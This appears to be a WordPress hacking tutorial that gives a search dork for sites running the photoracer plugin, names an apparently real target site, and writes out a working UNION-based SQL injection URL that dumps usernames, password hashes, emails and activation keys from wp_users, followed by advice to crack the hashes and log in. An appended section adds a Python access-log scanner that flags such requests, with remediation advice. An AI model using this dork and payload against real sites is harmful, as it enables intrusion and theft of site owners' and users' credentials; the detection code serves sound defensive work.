Here is a new way of WordPress hacking,
very simple, very easy.
So let's start, guys!
The dork is:

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

See the result:

And I'm going to test one of them:

http://bzone2.makeeitsolutions.com/designtogive/wp-content/plugins/photoracer/viewimg.php?id=-1

We are going to add the exploit, a UNION-based SQL injection in the id parameter that reads from the wp_users table. This is the exploit:

wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass,0x2d,user_email,0x3a,user_activation_key)%2C7%2C8%2C9+from+wp_users--


And the site looks like this:

http://bzone2.makeeitsolutions.com/designtogive/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass,0x2d,user_email,0x3a,user_activation_key)%2C7%2C8%2C9+from+wp_users--
                             



Now you can see the user and pass :D! Just crack the hash and it's done.
The admin panel is:

http://Site/wp-login.php
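
Seen from the site owner's side, requests like the ones above stand out in the web server access log, because a real image id never contains anything but digits. The following is an added example, not part of the original post: it scans log lines for requests to photoracer's viewimg.php whose id is not a plain number. The log lines are constructed, and the rule that a legitimate id is a non-negative integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:02:11 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:02:40 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2Cconcat(0x2d,user_login,0x2d,user_pass)%2C7%2C8%2C9+from+wp_users-- HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] "GET /blog/wp-content/plugins/photoracer/viewimg.php?id=40 HTTP/1.1" 200 4801 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
"""

# Client IP is the first field; the request target sits inside the quoted request line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]+")
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|\bwp_users\b", re.I | re.S)


def classify(line):
    """Return (client_ip, verdict, decoded_id) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/photoracer/viewimg.php"):
        return None
    # parse_qs undoes both '+' and %XX encoding, so the checks see the decoded value.
    # A missing id is treated as an empty value and is flagged too.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", [""]):
        if DIGITS_RE.fullmatch(value):
            continue  # assumption: a plain non-negative integer is the only legitimate id
        verdict = "sqli" if SQL_RE.search(value) else "non-numeric-id"
        return ip, verdict, value
    return None


def scan(log_text):
    """Classify every line and keep only the suspicious ones, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value}")
```

A hit with the verdict `sqli` followed by a 200 response means the wp_users hashes should be treated as exposed: rotate all passwords and remove or update the plugin.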
